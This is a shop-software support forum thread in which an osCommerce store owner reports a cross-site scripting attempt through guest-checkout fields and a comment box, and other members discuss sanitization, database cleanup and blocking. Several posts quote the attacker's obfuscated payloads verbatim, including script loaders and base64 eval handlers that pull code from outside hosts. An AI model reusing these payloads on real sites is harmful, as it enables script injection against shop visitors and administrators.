Jump to content
puggybelle

Hack attempt - is there a way to prevent this?

Recommended Posts

Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually):

Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC
244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_
Ithaca
Ithaca, New York 98765
United States

I've changed the name and address for this post as the street address, city, state and zip code they provided is legit. 

They checked out using the Checks/Money Order method - no account was created or ever existed for this buyer's name.

The order process email it generated bounced back to me as undeliverable:

A message that you sent contained one or more recipient addresses that were
incorrectly constructed:

  "Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC" <bobsmith987@hotmail.com>: unmatched doublequote in local part (expected word or "<")

This address has been ignored. There were no other addresses in your
message, and so no attempt at delivery was possible.

Is there a way to prevent that?  Stop someone from proceeding when adding garbage in the name and address fields? 

And...can someone tell me what it is they're trying to accomplish by doing this?  Thanks!

- Andrea

 

Share this post


Link to post
Share on other sites
Posted (edited)

Yes it's quite simple they are trying to get you to save this to your db. They know if they use your form and finish osC will save to db and that is what they do to get into the db.

You should deleat the account and clear the crap from the db.

What they were trying to do? Who knows!

Edited by JcMagpie

 

Share this post


Link to post
Share on other sites
18 minutes ago, JcMagpie said:

clear the crap from the db.

Can you be a little more specific?  I deleted the order - no account existed.

I found some interesting info online when searching a bit deeper.  The name has been reported numerous times from other websites seeing injection code in the name and address fields, and some ending up on the receiving end of credit card fraud. 

Google the phrase Linda Juan Fraud and see what comes up.  Guess it was just my turn!  Hope they send cash...

- Andrea

 

 

 

Share this post


Link to post
Share on other sites

@puggybelle

As I understand it, osC has filters in place to prevent 'customers' from entering injection code when filling out forms. You did say that you are using PWA. While I have not looked into the latest version of PWA, it too should have filters in place to prevent injection code from being entered. If not, this needs to be brought to the attention of the people maintaining the code.

That said, IIRC, the latest version of PWA is supposed to delete any customer record after the 'guest' checks out. I'm pretty sure that's why no 'customer' account exists.

M


Get the latest Responsive osCommerce CE (community edition) here .

Share this post


Link to post
Share on other sites
Posted (edited)
16 minutes ago, ArtcoInc said:

While I have not looked into the latest version of PWA, it too should have filters in place to prevent injection code from being entered. If not, this needs to be brought to the attention of the people maintaining the code.

PWA uses exact the same coding which sanitizes customer input to store the customers data in the database like the core create account page. So it is as save as the  core create account in that sense.

Edited by raiwa

Share this post


Link to post
Share on other sites

@raiwa

Thank you for that clarification. Can you explain then how the injection code ended up in the orders record? Or, is that an issue with her version of osC not sanitizing the customer input in the orders record?

M


Get the latest Responsive osCommerce CE (community edition) here .

Share this post


Link to post
Share on other sites

I always forget to say which version I'm using.

I'm using 2.3.4.1 CE with the latest version of PWA.

- Andrea

Share this post


Link to post
Share on other sites

@puggybelle

Unfortunately, the Community Edition version of osC does not have an accurate version number system. Do you know if you are using 'Frozen'? Or a version or 'Edge'? The only way to really know which version you have is to look at the date of the original code package.

M


Get the latest Responsive osCommerce CE (community edition) here .

Share this post


Link to post
Share on other sites

FWIW, 'Frozen' was released on Aug 31, 2018. Additional work continues to be done under the 'Edge' name.

M


Get the latest Responsive osCommerce CE (community edition) here .

Share this post


Link to post
Share on other sites

Is there anything I need to do?

When I run Version Checker in Admin, it comes back with:

version.PNG.dc5290f84196238917ed1de029089582.PNG

- Andrea

Share this post


Link to post
Share on other sites

@puggybelle

(while off topic ...)

As I said, the Community Edition does not have an accurate version numbering system.

When Burt started this project back in 2014, osC was at version 2.3.3.4. So, the Community Edition, all through its early development, was also v2.3.3.4. Every release during these early times was called v2.3.3.4.

When osC upgraded to v2.3.4, Burt brought the Community Edition code base up to the v2.3.4 code base, and the Community Edition stayed at v2.3.4 while further development was happening. Somewhere during this time, Burt released the 'Gold' fixed release. Development still continued, with every release still being called v2.3.4.

When osC had the v2.3.4.1 Hot Patch applied, Burt also applied the Hot Patch, and the Community Edition was bumped up to v2.3.4.1. Once again, development continued, with every new release still being called v2.3.4.1.

Burt released the 'Frozen' fixed release in August, 2018. Development still continues (usually called 'Edge', although that is not a fixed release), and the version number is *still* v2.3.4.1.

Some bugs have been identified in 'Frozen', and there is a thread here on the forum identifying them (and some fixes too). 'Edge' continues to be developed (still being called v2.3.4.1), and some significant changes have been made since 'Frozen', causing some compatibility issues with prior versions, and many (most?) add-ons out there.

This all said ...

You can download the 'Frozen' version (see the link in my signature below). *** IF *** you have made NO core changes, you *should* be able to drop the 'Frozen' version into your store. Otherwise, you will need to use a file compare application to see what changes have been made since your release.

(now, to get back on topic ...)

How this all relates to your initial problem, I don't know. Someone with a higher pay grade than myself will need to explore how the injection code made its way into your orders record.

M


Get the latest Responsive osCommerce CE (community edition) here .

Share this post


Link to post
Share on other sites
6 hours ago, puggybelle said:

Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC

When the form is submitted, the commands are stripped from it. That is why you see the __script instead of <script. That renders the code useless as far as the hacker is concerned. At least it should. I never assume anything when they are involved.

If you have an addon that records the IP, like View Counter or IP Blocker, then you should block the IP. That won't prevent others from using the same method but it might stop that guy.

Share this post


Link to post
Share on other sites

@ArtcoInc

Well, this is just a mess!  My core code has been modified substantially, so...I have a lot to think about now.  But, Thank You for helping!

@Jack_mcs

Upon viewing the order process email that bounced back after this hack attempt, I see a huge chunk of malicious code that was inserted in the text section of the order form.  The part where buyers can add any additional comments with their purchase.  But, the < > tags have been stripped.  Looks like this:

_/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_
_/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fjb.gy%2Fi%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_

It'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that.  I bet someone in this forum knows...

I will take comfort in knowing that the code is being sanitized and just leave it at that.  This hacker nonsense is crazy and worse then ever.

Thanks to everyone who posted - I appreciate it very much!

- Andrea

Share this post


Link to post
Share on other sites

I would say you still need to clean your db of any remnents of the injected script. The sanitiser is not 100%! hackers know how this is done and  add redundent characters to fool it.

manualy clean the db then run virus scaner on the server if you can or tell your host the script has been injected.

You "MAY" have to restore db and/or site from backups before the injection if they find it has spread.

 


 

Share this post


Link to post
Share on other sites

This is only appearing in this one order's data, and is not in everyone's (or in your osC code)? They are definitely trying to provoke your server into running what's presumably some nasty script code, but it's being disabled by osC. If it's just this one guy, cancel any payment made (so you're not in legal trouble for keeping payment and not delivering) and cancel the order, and fuhgettaboudit. Unless you want to jump through the hoops of reporting them to the payment processor. If everyone is seeing this, you've got some cleanup to do and security holes to patch.

They're trying to inject and run some script code that creates more script, invisible images, and input field elements on your page. Some server in Guyana (they have computers there???) is involved (perhaps to load more malicious code). I haven't dived more deeply into it, but it looks like something you don't want running. Just be thankful it was (apparently) disabled before it could do the nasty.


If you are running the "official" osC 2.3.4 or 2.3.4.1 download, your installation is obsolete! Get (stable) Frozenpatches or (unstable) Edge. See also the naming convention and the latest community-supported responsive "Edge" release

Share this post


Link to post
Share on other sites
13 hours ago, puggybelle said:

t'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that.

The jb.gy is a link to the hacker site. The gy is the TLD for Guyana. Once the full code is in your database, the hacker could access and load whatever from his site.

If your host offers country blocking, or if you have View Counter installed, then you should block Guyana, assuming you would not sell to anyone from there, along with any other country you won't sell to.

Share this post


Link to post
Share on other sites

I'm not so sure the script was stopped! Decoding what @puggybelle posted most of it looks untouched and may still be active. If I decoded correctly and it looks as if it did I get,

_/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_
_/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var=document.createElement("script");b.src="http://jb.gy/"+Math.random();(document.getElementsByTagName("HEAD")[]||document.body).appendChild();/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_

As you see most of the hexadecimal was left un striped and works.

I think its active and still valid and will need to be roooted out of the site, but I could be wrong! you can never be sure about these bits of *~##ity scripts.


 

Share this post


Link to post
Share on other sites
12 hours ago, MrPhil said:

If it's just this one guy, cancel any payment made (so you're not in legal trouble for keeping payment and not delivering) and cancel the order, and fuhgettaboudit

They checked out using the checks/money order selection so no worries about payment or delivery.  And I sincerely hope that this is a one-off thing and all will be well.

I have contacted my webhost with full details and am awaiting a response now. 

Other orders have come thru fine, so I'm hopeful that deleting the order is the end of it.  This crap is really scary, you know?

3 hours ago, JcMagpie said:

I think its active and still valid and will need to be roooted out of the site, but I could be wrong!

Well, I'm sure the webhost knows more than I do about these things, so...I've put it all in their lap now.  I haven't the faintest idea how to go about manually cleaning the database.  Hopefully, they'll find nothing and I can forget about it. 

 

10 hours ago, Jack_mcs said:

If your host offers country blocking, or if you have View Counter installed, then you should block Guyana,

My host does NOT offer country blocking.  I had View Counter installed for a brief time, back when I had SEO-G urls running, but there was some conflict and I ended up uninstalling View Counter.  In retrospect, it should have been the other way around.  I now use Ultimate SEO URLs.  Live and learn, I guess.

I'll post back with any response I get from the webhost.  Hopefully, everything is okay.  Thanks all!

- Andrea

Share this post


Link to post
Share on other sites

Okay, here's where I'm at.

Webhost scanned the database and found three similar patterns of jb.gy in the sessions table and removed them.

No new files had been added to the website.

And just encouragement to upgrade my installation to the 'frozen' version, I think it's called.  And that's what I thought I had!

Oh, well.  Work to do but it didn't turn out to be a disaster.  Think I will give View Counter another look, though...

If I have to block half the world, I'll do it!  Thanks everybody!

- Andrea

 

Share this post


Link to post
Share on other sites
Posted (edited)

If you often visit unknown sites, I recommend then to use a VPN software for your security, because your private data can be stolen in any moment. 

Edited by kymation
Link not allowed

Share this post


Link to post
Share on other sites
Posted (edited)
On 1/8/2019 at 6:00 PM, puggybelle said:

Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually):


Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC
244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_
Ithaca
Ithaca, New York 98765
United States

I've changed the name and address for this post as the street address, city, state and zip code they provided is legit. 

They checked out using the Checks/Money Order method - no account was created or ever existed for this buyer's name.

The order process email it generated bounced back to me as undeliverable:


A message that you sent contained one or more recipient addresses that were
incorrectly constructed:

  "Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC" <bobsmith987@hotmail.com>: unmatched doublequote in local part (expected word or "<")

This address has been ignored. There were no other addresses in your
message, and so no attempt at delivery was possible.

Is there a way to prevent that?  Stop someone from proceeding when adding garbage in the name and address fields? 

And...can someone tell me what it is they're trying to accomplish by doing this?  Thanks!

- Andrea

 

I had a similar incident, where someone created an account with a script, no order was placed tho...  but after doing checks nothing seems to have been changed, think I've been let off this time...

Would you suggest using website security/firewall like siteguarding or sucuri would help prevent future issues like this?

Thank you in advance.

 

Edited by pete2007

Share this post


Link to post
Share on other sites
15 minutes ago, pete2007 said:
On ‎1‎/‎8‎/‎2019 at 1:00 PM, puggybelle said:

 

I had a similar incident, where someone created an account with a script, no order was placed tho

It's a very common thing for all database sites. See this thread for suggestions.

Share this post


Link to post
Share on other sites

I want to report that I had another hack attempt this week - this time, thru the Search box.  Apparently, there's no limit to what can be entered in the search field.

I use an old contrib that I cleaned up called Keyword Search Report and when I looked at it yesterday, it was hysterical.

Huge chunks of malicious code.  Wish I had taken a screenshot of it, but I was so ticked off I immediately deleted the report and checked the database.

I have since edited all files containing the Search form and put a maxlength="60" in all of them.

catalog > advanced_search.php

catalog > includes > modules > boxes>bm_search.php

catalog > includes > modules>content > header>cm_header_search.php

If I'm missing something, please let me know.  This hacker crap is insane!

- Andrea

 

Share this post


Link to post
Share on other sites
Posted (edited)
9 minutes ago, puggybelle said:

Huge chunks of malicious code. 

Sorry? Where were these huge chunks of code???????

If the code was in a file on your server - you have a HUGE issue... that is nothing to do with the file its self.

Edited by greasemonkey
typo

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×